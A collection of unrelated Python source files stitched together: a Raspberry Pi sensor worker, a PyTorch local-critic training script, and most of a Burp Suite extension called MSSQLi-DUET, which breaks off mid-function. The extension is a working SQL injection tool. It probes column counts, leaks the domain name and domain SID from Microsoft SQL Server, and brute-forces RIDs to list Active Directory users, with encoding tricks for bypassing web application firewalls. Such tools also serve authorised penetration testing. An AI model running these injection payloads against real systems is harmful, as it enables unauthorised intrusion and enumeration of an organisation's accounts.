# http://stackoverflow.com/questions/37923772/cannot-delete-a-chat-message-via-slack-api
pass
|
pi_sensor_worker.py
|
import time
import datetime
import json
import redis
import threading
import sys
sys.path.append('..')
from sensors.pi.float_sensor import (FloatSensor)
from sensors.pi.humidity_sensor import (HumiditySensor)
from sensors.pi.temperature_sensor import (TemperatureSensor)
from sensors.pi.soil_sensor import (SoilSensor)
import variables
#r = redis.Redis(host='127.0.0.1', port=6379)
# def clamp(n, smallest, largest): return max(smallest, min(n, largest))
class PiSensorWorker():
def __init__(self, config, main_thread_running, system_ready):
#self.config = {**config, **self.config}
self.config = config
self.channel = config.get('channel', 'sensors').replace(" ", "_").lower()
self.sleep_duration = config.get('sleep_duration', 30)
self.main_thread_running = main_thread_running
self.system_ready = system_ready
#Store pump event so we can shutdown pump with float readings
self.sensors = []
self.init_sensors()
return
def dynamic_import(self, name):
#Split path of the class folder structure: {sensor name}_sensor . {SensorName}Sensor
components = name.split('.')
#Dynamically import root of component path
module = __import__(components[0])
#Get component attributes
for component in components[1:]:
module = getattr(module, component)
return module
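# Illustration of the lookup above: because the sensor modules are already imported at the top
# of this file, __import__('sensors') returns the root package and getattr() can walk the rest
# of the dotted path, e.g. (the pin/key values are hypothetical):
#   cls = self.dynamic_import('sensors.pi.humidity_sensor.HumiditySensor')
#   sensor = cls(name='humidity', pin=4, key='humidity_1')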
def init_sensors(self):
for sensor in self.config['sensors']:
if sensor.get('type', None) is not None:
# Get the sensor class from the sensors folder:
# {sensor name}_sensor.{SensorName}Sensor
sensor_type = 'sensors.pi.' + sensor.get('type').lower() +\
'_sensor.' + sensor.get('type').capitalize() + 'Sensor'
imported_sensor = self.dynamic_import(sensor_type)
# Define default kwargs for all sensor types, conditionally include optional variables below if they exist
sensor_kwargs = {
'name' : sensor.get('name', sensor.get('type')),
'pin' : int(sensor.get('pin')),
'key' : sensor.get('key', None)
}
# optional sensor variables
# Model is specific to DHT modules to specify DHT11 DHT22 or DHT2302
if sensor.get('model'):
sensor_kwargs['model'] = sensor.get('model')
new_sensor = imported_sensor(**sensor_kwargs)
new_sensor.init_sensor()
#Set the sensor type and determine if the readings are critical to operations
new_sensor.type = sensor.get('type').lower()
if sensor.get('critical', None) is not None:
new_sensor.critical = True
else:
new_sensor.critical = False
self.sensors.append(new_sensor)
print('{type} Sensor (Pi) {pin}...\t\t\033[1;32m Ready\033[0;0m'.format(**sensor))
return
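# Example of the config shape init_sensors() expects (keys taken from the lookups above; the
# values themselves are hypothetical):
#   {
#       'channel': 'sensors',
#       'sleep_duration': 30,
#       'sensors': [
#           {'type': 'humidity', 'name': 'greenhouse_dht', 'pin': 4, 'key': 'humidity_1', 'model': '22'},
#           {'type': 'float', 'name': 'tank_float', 'pin': 17, 'key': 'float_1', 'critical': True}
#       ]
#   }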
def run(self):
t = threading.Thread(target=self.work, args=())
t.start()
# Report how many sensor objects were actually initialized
print('Pi Sensor Worker [' + str(len(self.sensors)) + ' Sensors]...\t\t\033[1;32m Running\033[0;0m')
return t
def work(self):
while self.main_thread_running.is_set():
if self.system_ready.is_set():
message = {'event':'PiSensorUpdate'}
readings = {}
for sensor in self.sensors:
#breakpoint()
result = sensor.read()
readings[sensor.key] = result
variables.r.set(sensor.key, json.dumps(result))
#print(sensor.name, result)
#Check for a critical water level from any float sensors
if sensor.type == 'float':
if sensor.critical:
if result:
pass
#self.pump_ready.set()
else:
pass
#self.pump_ready.clear()
#print(readings)
message['data'] = readings
variables.r.publish(self.channel, json.dumps(message))
time.sleep(self.sleep_duration)
time.sleep(2)
# This only runs after the main thread has been shut down
print("Pi Sensor Worker Shutting Down...\t\033[1;32m Complete\033[0;0m")
|
train.py
|
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import time
import multiprocessing as mp
from torch.autograd import Variable
from utils import *
def LC_Train(lower_network, upper_network, local_network, train_loader, test_loader, args, device):
optimizer_1 = torch.optim.Adam(lower_network.parameters(), lr=args.lr)
optimizer_2 = torch.optim.Adam(upper_network.parameters(), lr=args.lr)
optimizer_LC = torch.optim.Adam(local_network.parameters(), lr=args.lr)
shm_lists = []
shm_target = SharedTensor([args.batch_size,], dtype='int32')
shm_lists.append(shm_target) # [0]
shm_lists.append(shm_target) # [1]
test_inputs = torch.FloatTensor(1, args.image_dim, args.image_size, args.image_size) # for CIFAR10, for MNIST (1,1,28,28)
shape = compute_shapes(lower_network, test_inputs, args)
shm_data = SharedTensor(shape)
shm_lists.append(shm_data) # [2]
shm_lists.append(shm_data) # [3]
shm_loss = SharedTensor([args.batch_size, ], dtype='float32')
shm_lists.append(shm_loss) # [4]
shm_lists.append(shm_data) # [5]
queue_lists =[]
for _ in range(0,5):
queue_lists.append(mp.Queue())
print(' Epoch Train_Acc(%) Train_Loss Test_Acc(%) Test_Loss Training_time(s)')
processes = []
p = mp.Process(target=train_lower, args=(train_loader, test_loader, lower_network, optimizer_1, shm_lists, args, queue_lists, device))
p.start()
processes.append(p)
p = mp.Process(target=train_upper, args=(train_loader, test_loader, upper_network, optimizer_2, shm_lists, args, queue_lists, device))
p.start()
processes.append(p)
p = mp.Process(target=train_local, args=(train_loader, test_loader, local_network, optimizer_LC, shm_lists, args, queue_lists, device))
p.start()
processes.append(p)
for p in processes:
p.join()
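# Note on the `args` namespace used throughout this file (attributes collected from the accesses
# above, nothing extra assumed): lr, batch_size, image_dim, image_size, epochs and
# time_sleep_iteration must all be set before calling LC_Train. Because the three loops run in
# separate processes that move models to `device`, a 'spawn' start method is typically required
# when `device` is a CUDA device, e.g.:
#   mp.set_start_method('spawn')   # sketch; call once in the launcher before LC_Train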
def train_lower(train_loader, test_loader, model, optimizer, shm_lists, args, queue_lists, device):
model.to(device)
for epoch in range(args.epochs):
model.train()
for i, (inputs, target) in enumerate(train_loader):
while len(inputs) != args.batch_size:
inputs_copy_len = (args.batch_size - len(inputs)) if (args.batch_size - len(inputs) <= len(inputs)) else len(inputs)
inputs = torch.cat([inputs, inputs[0:inputs_copy_len]], 0)
target = torch.cat([target, target[0:inputs_copy_len]], 0)
time.sleep(args.time_sleep_iteration)
# send target to the last processor
inputs = inputs.to(device)
output = model.forward(inputs)
shm_lists[0].send(target)
shm_lists[1].send(target)
shm_lists[2].send(output.data)
shm_lists[3].send(output.data)
queue_lists[1].put(1)
queue_lists[2].put(1)
optimizer.zero_grad()
queue_lists[4].get()
grad = shm_lists[5].recv()
grad = grad.to(device)
output.backward(grad)
optimizer.step()
model.eval()
for i, (inputs, target) in enumerate(test_loader):
while len(inputs) != args.batch_size:
inputs_copy_len = (args.batch_size - len(inputs)) if (args.batch_size - len(inputs) <= len(inputs)) else len(inputs)
inputs = torch.cat([inputs, inputs[0:inputs_copy_len]], 0)
target = torch.cat([target, target[0:inputs_copy_len]], 0)
time.sleep(args.time_sleep_iteration)
# send target to the last processor
inputs = inputs.to(device)
output = model.forward(inputs)
shm_lists[0].send(target)
shm_lists[1].send(target)
shm_lists[2].send(output.data)
shm_lists[3].send(output.data)
queue_lists[1].put(1)
queue_lists[2].put(1)
queue_lists[3].get()
queue_lists[4].get()
def train_upper(train_loader, test_loader, model, optimizer, shm_lists, args, queue_lists, device):
model.to(device)
criterion1 = nn.CrossEntropyLoss(reduction='none')
criterion2 = nn.CrossEntropyLoss()
for epoch in range(args.epochs):
model.train()
start_time = time.time()
train_losses = AverageMeter()
train_acc = AverageMeter()
test_losses = AverageMeter()
test_acc = AverageMeter()
for i in range(len(train_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[1].get()
target = shm_lists[0].recv()
target = target.to(device)
inputs = shm_lists[2].recv()
inputs = inputs.to(device)
target_var = Variable(target)
inputs_var = Variable(inputs, requires_grad=True)
output = model(inputs_var)
loss1 = criterion1(output, target_var)
loss = criterion2(output, target_var)
shm_lists[4].send(loss1.data)
queue_lists[3].put(1)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
train_losses.update(loss.data, target.size(0))
train_acc.update(prec1, target.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
training_time = time.time()-start_time
for i in range(len(test_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[1].get()
target = shm_lists[0].recv()
inputs = shm_lists[2].recv()
target = target.to(device)
inputs = inputs.to(device)
output = model(inputs)
loss = criterion2(output, target)
queue_lists[3].put(1)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
test_losses.update(loss.data, target.size(0))
test_acc.update(prec1, target.size(0))
print('Main Network ','{epoch:d} {acc.avg:.3f} {losses.avg:.3f} {test_acc.avg:.3f} {test_losses.avg:.3f} {time:.3f} \n'.format(epoch=epoch, acc=train_acc, losses=train_losses, test_acc=test_acc, test_losses=test_losses, time=training_time), end=' ',flush=True)
def train_local(train_loader, test_loader, model, optimizer, shm_lists, args, queue_lists, device):
model.to(device)
criterion1 = nn.CrossEntropyLoss(reduction='none')
criterion2 = nn.CrossEntropyLoss()
criterion_mse = nn.MSELoss()
for epoch in range(args.epochs):
model.train()
start_time = time.time()
train_losses = AverageMeter()
train_acc = AverageMeter()
test_losses = AverageMeter()
test_acc = AverageMeter()
for i in range(len(train_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[2].get()
target = shm_lists[1].recv()
inputs = shm_lists[3].recv()
inputs = inputs.to(device)
target = target.to(device)
target_var = Variable(target)
inputs_var = Variable(inputs, requires_grad=True)
output = model(inputs_var)
loss = criterion2(output, target_var)
loss.backward(retain_graph=True)
shm_lists[5].send(inputs_var.grad.data)
queue_lists[4].put(1)
queue_lists[3].get()
loss_true = shm_lists[4].recv()
loss_true = loss_true.to(device)
loss_l = criterion1(output, target_var)
loss_lc = criterion_mse(loss_l, loss_true)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
train_losses.update(loss.data, target.size(0))
train_acc.update(prec1, target.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss_lc.backward(retain_graph=True)
optimizer.step()
training_time = time.time()-start_time
for i in range(len(test_loader)):
time.sleep(args.time_sleep_iteration)
queue_lists[2].get()
target = shm_lists[1].recv()
inputs = shm_lists[3].recv()
inputs = inputs.to(device)
target = target.to(device)
output = model(inputs)
loss = criterion2(output, target)
queue_lists[4].put(1)
prec1, prec5 = accuracy(output.data, target, topk=(1, 5))
test_losses.update(loss.data, target.size(0))
test_acc.update(prec1, target.size(0))
print('Local Network ','{epoch:d} {acc.avg:.3f} {losses.avg:.3f} {test_acc.avg:.3f} {test_losses.avg:.3f} {time:.3f} \n'.format(epoch=epoch, acc=train_acc, losses=train_losses, test_acc=test_acc, test_losses=test_losses, time=training_time), end=' ',flush=True)
|
mssqli-duet-plugin.py
|
#Import Burp Objects
from burp import IBurpExtender, IBurpExtenderCallbacks, ITab, IContextMenuFactory, IMessageEditorTab, IMessageEditorController, IHttpRequestResponse
#Import Java GUI Objects
from java.awt import Dimension, FlowLayout, Color, Toolkit
from java.awt.datatransfer import Clipboard, StringSelection
from javax import swing
from thread import start_new_thread
from java.util import ArrayList
import sys, time, threading, base64, re, string
from java.io import PrintWriter
import urllib
import struct
import json
try:
from exceptions_fix import FixBurpExceptions
except ImportError:
pass
class BurpExtender (IBurpExtender, ITab, IBurpExtenderCallbacks, IContextMenuFactory, IMessageEditorTab, IMessageEditorController, IHttpRequestResponse):
# Extention information
EXT_NAME = "MSSQLi-DUET"
EXT_DESC = "Enumerate Active Directory users, groups, and machines via SQL injection."
EXT_AUTHOR = "Devin Casadey (Keramas)"
# Output info to the Extensions console and register Burp API functions
def registerExtenderCallbacks(self, callbacks):
print "Name: \t\t" + BurpExtender.EXT_NAME
print "Description: \t" + BurpExtender.EXT_DESC
print "Authors: \t" + BurpExtender.EXT_AUTHOR
# Required for easier debugging:
# https://github.com/securityMB/burp-exceptions
sys.stdout = callbacks.getStdout()
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
callbacks.setExtensionName(BurpExtender.EXT_NAME)
stdout = PrintWriter(callbacks.getStdout(), True)
callbacks.registerContextMenuFactory(self)
self.httpTraffic = None
self.resp = None
#Create panels used for layout; we must stack and layer to get the desired GUI
self.tab = swing.Box(swing.BoxLayout.Y_AXIS)
self.tabbedPane = swing.JTabbedPane()
self.tab.add(self.tabbedPane)
# First tab
self.duetTab = swing.Box(swing.BoxLayout.Y_AXIS)
self.tabbedPane.addTab("MSSQLi-DUET", self.duetTab)
# Create objects for the first tab's GUI
# These rows will add top to bottom on the Y Axis
self.t1r1 = swing.JPanel(FlowLayout())
self.t1r2 = swing.JPanel(FlowLayout())
self.t1r3 = swing.JPanel(FlowLayout())
self.t1r4 = swing.JPanel(FlowLayout())
self.t1r5 = swing.JPanel(FlowLayout())
self.t1r6 = swing.JPanel(FlowLayout())
self.t1r7 = swing.JPanel(FlowLayout())
# Now add content to the first tab's GUI objects
self.encodingBox = swing.JComboBox(["None","unicode","unicode_unescaped","doubleencode","unmagicquotes"])
self.delayBox = swing.JTextField("0",3)
self.ridMinBox = swing.JTextField("1000",5)
self.ridMaxBox = swing.JTextField("1500",5)
self.paramBox = swing.JTextField("",15)
self.injectBox = swing.JTextField("",15)
self.outputTxt = swing.JTextArea(10,50)
self.outputScroll = swing.JScrollPane(self.outputTxt)
self.requestTxt = swing.JTextArea(10,50)
self.requestScroll = swing.JScrollPane(self.requestTxt)
self.requestTxt.setLineWrap(True)
self.outputTxt.setBackground(Color.lightGray)
self.outputTxt.setEditable(False)
self.outputTxt.setLineWrap(True)
self.t1r1.add(swing.JLabel("<html><center><h2>MSSQLi-DUET</h2>Enumerate Active Directory users, groups, and machines via SQL injection.</center></html>"))
#Add labels here for all of the args needed.
self.t1r2.add(swing.JLabel("WAF Bypass Method:"))
self.t1r2.add(self.encodingBox)
#Minimum RID value
self.t1r2.add(swing.JLabel("Minimum RID value:"))
self.t1r2.add(self.ridMinBox)
#Maximum RID value
self.t1r2.add(swing.JLabel("Maximum RID value:"))
self.t1r2.add(self.ridMaxBox)
#Delay for requests
self.t1r2.add(swing.JLabel("Delay:"))
self.t1r2.add(self.delayBox)
#Vulnerable parameter
self.t1r3.add(swing.JLabel("Vulnerable Parameter:"))
self.t1r3.add(self.paramBox)
#Injection starting point
self.t1r3.add(swing.JLabel("Injection start:"))
self.t1r3.add(self.injectBox)
#Request section
self.t1r4.add(swing.JLabel("Raw request:"))
self.t1r4.add(self.requestScroll)
self.t1r5.add(swing.JButton("Run", actionPerformed=self.executePayload))
self.t1r5.add(swing.JButton("Clear", actionPerformed=self.clearRequest))
#Results section
self.t1r6.add(swing.JLabel("Results Output:"))
self.t1r6.add(self.outputScroll)
self.t1r7.add(swing.JButton("Copy results to Clipboard", actionPerformed=self.copyToClipboard))
self.t1r7.add(swing.JButton("Clear", actionPerformed=self.clearOutput))
# Add the GUI objects into the first tab
self.duetTab.add(self.t1r1)
self.duetTab.add(self.t1r2)
self.duetTab.add(self.t1r3)
self.duetTab.add(self.t1r4)
self.duetTab.add(self.t1r5)
self.duetTab.add(self.t1r6)
self.duetTab.add(self.t1r7)
# Now that the GUI objects are added, we can resize them to fit snug in the UI
self.t1r1.setMaximumSize(Dimension(850, 100))
self.t1r2.setMaximumSize(Dimension(875, 50))
self.t1r3.setMaximumSize(Dimension(800, 75))
self.t1r4.setMaximumSize(Dimension(800, 200))
self.t1r5.setMaximumSize(Dimension(800, 50))
self.t1r6.setMaximumSize(Dimension(800, 200))
self.t1r7.setMaximumSize(Dimension(800, 200))
#Register the panel in the Burp GUI
callbacks.addSuiteTab(self)
return
#Create context menu entry
def createMenuItems(self,invocation):
self.context = invocation
itemContext = invocation.getSelectedMessages()
if itemContext:
menuList = ArrayList()
menuItem = swing.JMenuItem("Send request to MSSQLi-DUET", actionPerformed=self.writeRequestToTextBox)
menuList.add(menuItem)
return menuList
return None
def writeRequestToTextBox(self,event):
self.httpTraffic = self.context.getSelectedMessages()
httpRequest = [item.request.tostring() for item in self.httpTraffic]
request = ''.join(httpRequest)
self.requestTxt.text = request
def buildRequest(self):
stdout = PrintWriter(self._callbacks.getStdout(), True)
#Get data about the request that was right clicked
for item in self.httpTraffic:
try:
httpService = item.getHttpService()
host = httpService.host
port = httpService.port
protocol = httpService.protocol
protoChoice = True if protocol.lower() == 'https' else False
#Parse the text area that should contain an HTTP request.
requestInfo = self._helpers.analyzeRequest(self.requestTxt.text)
#Request data
headers = requestInfo.getHeaders()
bodyOffset = requestInfo.bodyOffset
body = self.requestTxt.text[bodyOffset:]
content_type = ""
for (i, header) in enumerate(headers):
if header.lower().startswith("content-type:"):
content_type = header.split(":")[1].lower().strip()
if content_type == "":
print("[-] No content-type header found. This could have detrimental effects.")
method = headers[0].split(" ")[0]
urlpath = headers[0].split(" ")[1]
#Debugging area for output and parsing
#stdout.println(str(body))
#stdout.println(str(headers))
#stdout.println(str(method))
#stdout.println(str(content_type))
#stdout.println(str(urlpath))
#Check param box for the vulnerable parameter and then build the payloads out.
parameter = self.paramBox.getText()
data = self.injectBox.getText()
if method == "GET":
body = urlpath.split("?")[1]
params = dict(x.split('=') for x in body.split('&'))
else:
#Add logic here for the handling parameters in body and JSON content
if "json" in str(content_type) or "JSON" in str(content_type):
params = json.loads(body)
print(body)
print(params)
else:
params = dict(x.split('=') for x in body.split('&'))
print(params)
#Check column numbers and type
column_number,column_type = self.determine_columns(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data)
if column_number == None or column_type == None:
break
#Get domain name
domain_name = self.leak_domain_name(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data,column_number,column_type)
#Get SID
domain_sid = self.extract_sid(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data,column_number,column_type,domain_name)
#Enum users
ad_data = self.enum_users(host,port,protoChoice,headers,params,method,urlpath,content_type,parameter,data,column_number,column_type,domain_name,domain_sid)
print("[!] Finished!")
self.outputTxt.append("[!] Finished!" + "\n")
except Exception as ex:
stdout.println("Problem parsing the request data" + "\n")
self.outputTxt.setText("[-] Problem parsing the request data. Check debug output for more details.")
stdout.println(ex)
return
def postRequest(self,headers,body,args_):
#Needed: args=[host,port,protoChoice,request]
stdout = PrintWriter(self._callbacks.getStdout(), True)
request = self._helpers.buildHttpMessage(headers,body)
args_.append(request)
t = threading.Thread(target=self.makeRequest,args=args_)
t.daemon = True
t.start()
t.join()
def getRequest(self,headers,args_):
#Needed: args=[host,port,protoChoice,request]
stdout = PrintWriter(self._callbacks.getStdout(), True)
body = "\r\n"
request = self._helpers.buildHttpMessage(headers,body)
args_.append(request)
t = threading.Thread(target=self.makeRequest,args=args_)
t.daemon = True
t.start()
t.join()
def makeRequest(self,host,port,protoChoice,request):
stdout = PrintWriter(self._callbacks.getStdout(), True)
try:
self.resp = self._callbacks.makeHttpRequest(
host,
port,
protoChoice,
request
)
except Exception as ex:
stdout.println(ex)
# Standard function: Set the tab name
def getTabCaption(self):
return BurpExtender.EXT_NAME
# Standard function: Set the GUI component in the tab
def getUiComponent(self):
return self.tab
#Clear the request box
def clearRequest(self, event):
self.requestTxt.setText("")
return
#Clear the output box
def clearOutput(self, event):
self.outputTxt.setText("")
return
#Main execution function
def executePayload(self, event):
self.buildRequest()
return
#copy output to clipboard for easy copy pasta of the results so it can be imported into intruder or different tools
def copyToClipboard(self, event):
clipboard = Toolkit.getDefaultToolkit().getSystemClipboard()
data = StringSelection(self.outputTxt.getText())
clipboard.setContents(data, None)
return
# SQL injection functions
#=====================================================================================
#Logic to determine the number of columns and the type of data that can be used.
def determine_columns(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data):
stdout = PrintWriter(self._callbacks.getStdout(), True)
print("[+] Determining the number of columns in the table...")
self.outputTxt.append("[+] Determining the number of columns in the table..." + "\n")
payload = data
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
#Make the request
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
print(headers)
try:
self.getRequest(headers,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
else:
try:
self.postRequest(headers,new_body,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
baseline = self.resp.tostring()
payload = data + " order by 1--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
print(new_body)
#Make the request
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
try:
self.getRequest(headers,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
else:
try:
self.postRequest(headers,new_body,[host,port,protoChoice])
except:
print("[-] Error determining number of columns.")
return None
second_response = self.resp.tostring()
# Modify logic here if the baseline request and the second response are actually always the same.
if len(baseline) == len(second_response):
print("[-] Error determining number of columns. Check payload or encoding")
self.outputTxt.setText("[-] Error determining number of columns. Check payload or encoding method appropriateness.")
column_number = None
column_type = None
return column_number,column_type
#Increment order by value to determine number of columns
i = 2
valid = True
while valid:
payload = data + " order by %d--" % i
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
newdata = self.resp.tostring()
if len(second_response) != len(newdata):
valid = False
break
#Break and error if there are too many columns. This is indicative of a logic error/infinite loop
elif i == 50:
valid = False
print("[-] Could not determine number of columns. Check payload and request data.")
break
return None
else:
i += 1
continue
column_number = (i-1)
print(column_number)
self.outputTxt.append(str(column_number) + "\n")
#Now determine what can be used for the column type
print("[+] Determining column type...")
self.outputTxt.append("[+] Determining column type..." + "\n")
try_types = ['null','1','test']
for j in try_types:
payload = data
payload += generate_payload(column_number,j)
payload += "@@version--"
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (str(key),str(val)) for (key,val) in body.iteritems())
print(new_body)
else:
new_body = json.dumps(body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
new_response = self.resp.tostring()
determinant = str(new_response)
column_type = None
if "Microsoft" in determinant:
column_type = j
print(j)
self.outputTxt.append(j + "\n")
break
else:
print("Column type not" + j)
self.outputTxt.append("Column not " + j + "\n")
return column_number,column_type
#Function to extract the name of the Domain from the database
def leak_domain_name(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data,column_number,column_type):
print("[+] Discovering domain name...")
self.outputTxt.append("[+] Discovering domain name..." + "\n")
payload = data
payload += generate_payload(column_number,column_type)
payload += "(SELECT CONCAT ( 'W00TW00T', (select default_domain()), 'W00TW00T' ) AS Result)--"
#payload += "(CAST((SELECT CONCAT ( 'W00TW00T', (select default_domain()), 'W00TW00T' ) AS Result) as nvarchar(4000)))"
payload += "," + column_type + "--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (key,str(val)) for (key,val) in body.iteritems())
print(new_body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
determinant = self.resp.tostring()
leaked_domain = str(re.search(r"(?<=W00TW00T)(.+?)(?=W00TW00T)",determinant).group())
print(leaked_domain)
self.outputTxt.append(leaked_domain + "\n")
return leaked_domain
#Use injection to leak the domain SID value in hex format
def extract_sid(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data,column_number,column_type,domain):
print("[+] Discovering domain SID...")
self.outputTxt.append("[+] Discovering domain SID..." + "\n")
payload = data
payload += generate_payload(column_number,column_type)
payload += "(SELECT CONCAT ( 'W00TW00T', (select sys.fn_varbintohexstr(SUSER_SID('%s\\Administrator'))), 'W00TW00T' ) AS Result)--" % domain
#payload += "(CAST((SELECT CONCAT ( 'W00TW00T', (select sys.fn_varbintohexstr(SUSER_SID('%s\\Administrator'))), 'W00TW00T' ) AS Result) as nvarchar(4000)))" % domain
payload += "," + column_type + "--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (key,str(val)) for (key,val) in body.iteritems())
print(new_body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
determinant = self.resp.tostring()
leaked_sid = str(re.search(r"(?<=W00TW00T)(.+?)(?=W00TW00T)",determinant).group())
result = prepare_sid(leaked_sid)
print(result)
self.outputTxt.append(result + "\n")
return result
#Enumerate for AD users given a range
def enum_users(self,host,port,protoChoice,headers,body,method,urlpath,content_type,parameter,data,column_number,column_type,domain,sid):
print("[+] Enumerating Active Directory via SIDs...")
self.outputTxt.append("[+] Enumerating Active Directory via SIDs..." + "\n" )
max_rid = self.ridMaxBox.getText()
min_rid = self.ridMinBox.getText()
time_delay = self.delayBox.getText()
users_list = []
for i in range(int(min_rid),int(max_rid)):
i = str(i)
payload = data
payload += generate_payload(column_number,column_type)
payload += "(SELECT CONCAT ( 'W00TW00T', (SUSER_SNAME(SID_BINARY(N'%s%s'))), 'W00TW00T' ) AS Result)--" % (sid,i)
#payload += "(CAST(((SELECT CONCAT ( 'W00TW00T', (SUSER_SNAME(SID_BINARY(N'%s%s'))), 'W00TW00T' ) AS Result) as nvarchar(4000)))" % (sid,i)
payload += "," + column_type + "--"
encoding = self.encodingBox.getSelectedItem()
if encoding != "None":
payload = payload_processing(payload,encoding)
else:
payload = self._helpers.urlEncode(payload)
body[parameter] = payload
print(body)
if "json" not in content_type.lower():
new_body = ""
new_body += '&'.join("%s=%s" % (key,str(val)) for (key,val) in body.iteritems())
print(new_body)
if method == "GET":
url1 = urlpath.split("?")[0]
url2 = "?" + str(new_body)
headers[0] = "GET " + str(url1) + str(url2) + " HTTP/1.1"
self.getRequest(headers,[host,port,protoChoice])
else:
self.postRequest(headers,new_body,[host,port,protoChoice])
determinant = self.resp.tostring()
if domain in determinant:
username = str(re.search(r"(?<=W00TW00T)(.+?)(?=W00TW00T)",determinant).group())
users_list.append(username)
time.sleep(int(time_delay))
for i in users_list:
self.outputTxt.append(i + "\n")
print(i)
return users_list
#=============================================================================================================
#Burp Error Debugging
'''
try:
FixBurpExceptions()
except:
pass
'''
# Begin tamper functions
# Modify area with tamper functions that you wish to use,
# and then modify args for the dropdown and the payload_processing() function
#
# https://github.com/sqlmapproject/sqlmap/tree/master/tamper
#==============================================================================================================
#Unescaped unicode for JSON type data
def unicode_encode_unescaped(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += "u%.4X" % ord(payload[i])
i += 1
return retVal
#Escaped unicode
def unicode_encode(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += "\\u00%s" % payload[i + 1:i + 3]
i += 3
else:
retVal += "\\u%.4X" % ord(payload[i])
i += 1
return retVal
def chardoubleencode(payload):
retVal = payload
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits:
retVal += '%%25%s' % payload[i + 1:i + 3]
i += 3
else:
retVal += '%%25%.2X' % ord(payload[i])
i += 1
return retVal
def unmagicquotes(payload):
retVal = payload
if payload:
found = False
retVal = ""
for i in range(len(payload)):
if payload[i] == '\'' and not found:
retVal += "%bf%27"
found = True
else:
retVal += payload[i]
continue
if found:
_ = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
if _ != retVal:
retVal = _
retVal += "-- -"
elif not any(_ in retVal for _ in ('#', '--', '/*')):
retVal += "-- -"
return retVal
#Payload processing function - Determines encoding path based on args.
#=======================================================================================
def payload_processing(payload,encoding):
if encoding == 'unicode':
mod_payload = unicode_encode(payload)
elif encoding == 'unicode_unescaped':
